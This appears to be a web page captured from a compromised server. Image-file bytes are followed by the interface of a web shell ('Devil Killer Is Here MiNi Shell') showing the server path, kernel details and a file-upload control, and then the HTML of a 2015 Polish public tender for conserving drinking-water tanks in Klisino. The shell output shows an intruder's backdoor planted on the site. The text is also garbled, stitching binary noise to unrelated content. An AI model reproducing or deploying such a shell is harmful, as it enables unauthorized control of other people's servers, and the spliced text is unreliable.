JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150911/238250-N-2015.html

<p class="kh_header"><b>Głubczyce: Wykonanie konserwacji zbiorników na wodę pitną o pojemności 2 x 150 m3 w miejscowości Klisino</b><br>
<b>Numer ogłoszenia: 238250 - 2015; data zamieszczenia: 11.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Głubczyckie Wodociągi i Kanalizacja sp. z o.o. , ul. Powstańców 2, 48-100 Głubczyce, woj. opolskie, tel. 077 4852721, faks 077 4852721 wew. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodociagi-glubczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie konserwacji zbiorników na wodę pitną o pojemności 2 x 150 m3 w miejscowości Klisino.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Wykonanie konserwacji bieżącej płaszcza wewnętrznego i elementów wewnątrz zbiornika żelbetowego na wodę pitną celem zabezpieczenia przed procesem korozji oraz w celu umożliwienia użytkowania obiektu w sposób zgodny z jego przeznaczeniem oraz z zapewnieniem bezpieczeństwa tego użytkowania. 
II.	Wymiana dwóch przejść rurociągu stalowego DN150 przez ścianę żelbetową zbiornika oraz odcinka rurociągu od rury stalowej nierdzewnej w zbiorniku do pierwszego kołnierza w komorze zasuw o długości ok. 2,20 m - dotyczy rurociągu tłocznego z SUW do zbiornika. Omawiane rurociągi zostały przedstawione na zdjęciach nr 1, 2 i 3 które stanowią załącznik do niniejszej SIWZ. 
III.	Wymiana dwóch przejść rurociągu stalowego DN150 przez ścianę żelbetową zbiornika oraz odcinka rurociągu wraz z kolanem DN150 od rury stalowej nierdzewnej w zbiorniku do pierwszego kołnierza w komorze zasuw o długości ok. 1,50 m - dotyczy rurociągu przelewowego. Omawiane rurociągi zostały przedstawione na zdjęciach nr 1 i 4 które stanowią załącznik do niniejszej SIWZ.

Zakres prac:
1.	Ocena stanu technicznego płaszcza wewnętrznego i elementów wewnątrz zbiornika, w tym w szczególności:
a. określenie robót, które należy wykonać. 
2.	Dobór technologii konserwacji bieżącej płaszcza wewnętrznego i elementów wewnątrz zbiornika, która spełni wszystkie wymagania określone przepisami prawa. Wszystkie materiały lub zastosowana technologia z wyspecyfikowaniem zastosowanych materiałów  do konserwacji muszą posiadać atesty PZH na kontakt z wodą pitną 
i zostać dopuszczone do zastosowania oraz posiadać dopuszczenie do stosowania na terenie Polski zgodnie z wymogami Prawo Budowlane. W przypadku posiadania atestu PZH na technologię jako całość winien on posiadać wyspecyfikowanie zastosowanych materiałów  wchodzących w jej skład. Materiały winny posiadać certyfikaty i atesty wymagane prawem. Wykonane prace winny spełniać wymagania podstawowe i funkcjonalne określone w obowiązujących przepisach a w szczególności: 
a)	Ustawa z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409).
b)	PN-EN 1508:202, Zaopatrzenie w wodę. Wymagania dotyczące systemów i ich części składowych przeznaczonych do gromadzenia wody. 
c)	PN-EN 1540-9, Wyroby i systemy do ochrony i napraw konstrukcji betonowych. Definicje, wymagania, sterowanie jakością i ocena zgodności. Część 9: Ogólne zasady dotyczące stosowania wyrobów i systemów. 
d)	PN-EN 1540-10, Wyroby i systemy do ochrony i napraw konstrukcji betonowych. Definicje, wymagania, sterowanie jakością i ocena zgodności. Część 10: Stosowanie wyrobów i systemów na placu budowy oraz sterowanie jakością prac. 
e)	PN-88/B-01807 Antykorozyjne zabezpieczenia w budownictwie. Konstrukcje betonowe i żelbetowe. Zasady diagnostyki konstrukcji. 
f)	PN-B-03264:2002 Konstrukcje betonowe, żelbetowe i sprężone. Obliczenia statyczne i projektowanie. 
g)	PN-82/B-01801 Antykorozyjne zabezpieczenia w budownictwie. Konstrukcje 
h)	betonowe i żelbetowe. Podstawowe zasady projektowania. 
i)	PN-86/B-01811 Antykorozyjne zabezpieczenia w budownictwie. Konstrukcje 
j)	betonowe i żelbetowe. Ochrona materiałowo-konstrukcyjna. Wymagania. 
k)	PN-63/B-06251 Roboty betonowe i żelbetowe. Wymagania techniczne. 
l)	PN-85/B-10702 Wodociągi i kanalizacja. Zbiorniki. Wymagania i badania przy odbiorze. 
m)	Obwieszczenie Ministra Infrastruktury z dn. 12.04.2002 r w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie Dz. U. nr 75 z 15.06.2002 r. 
n)	Instrukcja nr 240 ITB. Zabezpieczenie przed korozją konstrukcji betonowych i 
żelbetowych. Warszawa 1982 r.
o)  Inne przepisy prawa obowiązujące w tym zakresie.
3.	Dobór technologii winien umożliwić korzystanie po zakończeniu robót ze zbiornika wody pitnej bez wykonywania dodatkowych działań i prac przez Zamawiającego.
4.	Dokonanie prezentacji wybranej technologii konserwacji w siedzibie Zamawiającego. 
5.	Wykonanie robót budowalnych związanych z konserwacją bieżącą płaszcza wewnętrznego i elementów wewnątrz zbiornika winno być przeprowadzone:
a.	w dwóch etapach umożliwiających korzystanie z jednej komory w trakcie wykonywanych prac konserwacyjnych na potrzeby zaopatrzenia w wodę mieszkańców miejscowości Klisino, Kietlice, Szonów, Biernatów, Biernatówek 
i Lisięcice, 
b.	podstawą do przystąpienia do wykonywania prac konserwacyjnych drugiej komory jest uzyskanie pozytywnego wyniku badań o których mowa w pkt. 8 oraz odebranie bezusterkowego wykonania robót przez Zamawiającego pierwszej komory.  
6.	Sporządzenie zestawienia kosztów na wykonanie prac objętych przedmiotem zamówienia. 
Opracowania kosztowe muszą spełniać wymagania określone w:
a)	Rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i form dokumentacji projektowej, specyfikacji technicznych  wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2013 r. poz. 1129).
b)	Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. Nr 130 poz. 1389).
7.	Dostarczenie Zamawiającemu dokumentacji projektowej o której mowa w §18 Rozporządzenia Ministra Zdrowia z dnia 29 marca 2007 r. (Dz. U. nr 61 poz. 417 z poź. zm.) umożliwiającej uzyskanie pozytywnej opinii higienicznej na materiały zastosowane do konserwacji bieżącej płaszcza wewnętrznego i elementów wewnątrz zbiornika przed przystąpieniem do wykonania robót konserwacyjnych przez Wykonawcę. Uzyskanie pozytywnej opinii higienicznej na materiały stanowi podstawę do rozpoczęcia robót przez Wykonawcę. 
8.	Przeprowadzenie badań ujętych w Rozporządzeniu Ministra Zdrowia z dnia 29 marca 2007 r. (Dz. U. nr 61 poz. 417 z poź. zm.)  obejmujących pełny zakres monitoringu kontrolnego i przeglądowego i wykonanych przez certyfikowane laboratorium po zakończeniu robót budowlanych związanych z konserwacją każdej z komór (badanie muszą być wykonane po zakończeniu każdego z etapów). Pozytywny wynik badań stanowi podstawę do rozpoczęcia kolejnego etapu związanego z konserwacją drugiej komory. 

Przygotowane opracowanie w swej treści powinno zawierać w szczególności:
1.	określenie technologii konserwacji, materiałów, maszyn i urządzeń którymi będzie wykonana konserwacja. 
2.	określenie parametrów technicznych i funkcjonalnych przyjętych rozwiązań materiałowych dopuszczonych do obrotu i powszechnie dostępnych na rynku,  wybranej technologii, urządzeń i wyposażenia: uzgodnione z Zamawiającym na spotkaniach  roboczych. 
3.	określenie doboru technologii i dostosowanie jej do możliwości technicznych panujących w zbiorniku wody oraz w jego otoczeniu.
4.	dokumenty potwierdzające zgodność zastosowanej technologii i materiałów z przepisami prawa i normami, w tym atesty higieniczne PZH dopuszczające do kontaktu z wodą pitną oraz pozytywną ocenę higieniczną wydaną przez właściwego państwowego powiatowego lub państwowego granicznego inspektora sanitarnego. 
5.	określenie warunków i zaleceń do stosowania przy użytkowaniu i eksploatacji zbiornika przez Zamawiającego w sposób  nie powodujący utraty gwarancji i rękojmi w całym okresie na jaki została udzielona, wraz z wykazem środków zalecanych i niezbędnych do zapewniania poprawnej eksploatacji w tym do czyszczenia i dezynfekcji nie powodujących utraty gwarancji i rękojmi w całym okresie.  

Zakres prac do wykonania po przeprowadzeniu konserwacji
Wykonanie konserwacji bieżącej płaszcza wewnętrznego i elementów wewnątrz zbiornika winno zostać zakończone i potwierdzone wszelkimi niezbędnymi działaniami i badaniami, w tym w szczególności:
a.	przeprowadzeniem wytrzymałości powierzchniowej na:
i.	odrywanie. 
b.	przeprowadzeniem badań parametrów jakościowych wody obejmujących pełny zakres monitoringu kontrolnego i przeglądowego zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 29 marca 2007 r. (Dz. U. nr 61 poz. 417 z poź. zm.) wykonanych przez certyfikowane laboratorium, 
c.	przeprowadzeniem badań zastosowanej technologii na agresywność środowiska, 
d.	wykonaniem próby szczelności, 
e.	wykonaniem dezynfekcji, 
f.	wykonaniem monitorowania i pielęgnacji płaszcza wewnętrznego i elementów wewnętrznych zbiornika do momentu osiągnięcia pełnych parametrów oraz pełnej sprawności użytkowej w ramach przyjętej technologii do zastosowania. 
g.	podjęciem decyzji o napełnieniu zbiornika i zakwalifikowaniu go do eksploatacji.
Opis stanu oczekiwanego 
1.	Zabezpieczenie przed procesem korozji i uszkodzeniem płaszcza wewnętrznego i elementów wewnątrz zbiornika. 
2.	Umożliwienie korzystania ze zbiornika wody pitnej po zakończeniu robót związanych z konserwacją bieżącą, bez konieczności wykonywania dodatkowych działań i prac przez Zamawiającego. 
3.	Wykonawca wymaga udzielenia min. 5 letniej gwarancji na wykonany przedmiot zamówienia.
4.	Zapewnianie eksploatacji w sposób stabilny i odporny na awarie i inne zakłócenia.

Dla celów wykonania wizji lokalnej Zamawiający umożliwi dokonanie wejścia do zbiornika wody pitnej w terminie: 
a.	17.09.2015 r. - komora lewa. 

Do obowiązków Wykonawcy należy również zapewnienie we własnym zakresie dostawy energii elektrycznej na potrzeby wykonania prac konserwacyjnych objętych przedmiotem zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający określa kwotę wadium w wysokości: 1 500,00 zł.
2.	Wadium ma być wniesione przed upływem terminu składania ofert, w jednej lub kilku formach podanych w art. 45 ust. 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.):
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy Nr 65 8868 0004 1000 0000 0084 0001
4.	Kserokopię przelewu załącza się do oferty.
5.	W przypadku wniesienia wadium w poręczeniach lub gwarancjach, złożenia ich należy dokonać w kasie Głubczyckich Wodociągów i Kanalizacja Sp. z o.o., a kserokopię z potwierdzeniem złożenia (pieczątka wpływu do kasy) oraz za zgodność z oryginałem przez osobę podpisującą ofertę, dołączyć do oferty. Złożenie ma być dokonane przed terminem składania ofert.
6.    Wykonawca, który nie wniesie w wymaganym terminie wadium zostanie wykluczony z postępowania. 
7.    Wykonawca, którego oferta została wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego w okolicznościach przewidzianych w art. 46 ust. 4 a i 5 Ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze. zm.), stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o dotychczasowe zrealizowane zamówienia. Wykonawca w celu potwierdzenia, że spełnia warunek dotyczący posiadania wiedzy i doświadczenia, zobowiązany jest wykazać, że w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub uczestniczył w wykonaniu co najmniej 2 zadania odpowiadające zakresowi przedmiotu zamówienia tj. konserwacja zbiorników żelbetowych na wodę przeznaczoną do spożycia. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie łączne doświadczenie. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.) stanowiące załącznik nr 2 do SIWZ oraz wykaz wykonanych usług stanowiący załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia. Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.), stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca dysponuje odpowiednim potencjałem kadrowym zapewniającym wykonanie zamówienia w postaci osób zdolnych do wykonania zamówienia. Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.), stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Wykonawcy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Każdy Wykonawca musi posiadać opłaconą polisę OC w zakresie prowadzonej działalności na minimum 500 000,00 zł przez cały okres obowiązywania umowy (w zakresie od wykonywania przez ubezpieczonego czynności związanych  z przedmiotem zamówienia na wypadek wyrządzenia z tego tytułu szkody osobie trzeciej przez ubezpieczonego oraz jego podwykonawców z rozszerzeniem,  w postaci szkód osobowych, rzeczowych oraz strat finansowych będących  następstwem działania Wykonawcy, łącznie z czystymi stratami finansowymi  będącymi następstwem działań lub zaniechaniem działań). Polisa lub inny dokument potwierdzający aktualne ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności, muszą  być aktualne w dacie składania ofert. W przypadku wygaśnięcia ubezpieczenia przed końcem zawartej umowy, każdy Wykonawca zobowiązany jest złożyć oświadczenie o kontynuowaniu ubezpieczania. Polisa OC musi obowiązywać także przez cały okres udzielonej gwarancji i rękojmi. Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Na potwierdzenie spełnienia w/w warunku Wykonawca przedłoży oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 ze zm.) stanowiące załącznik nr 2 do SIWZ oraz opłaconą polisę OC. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
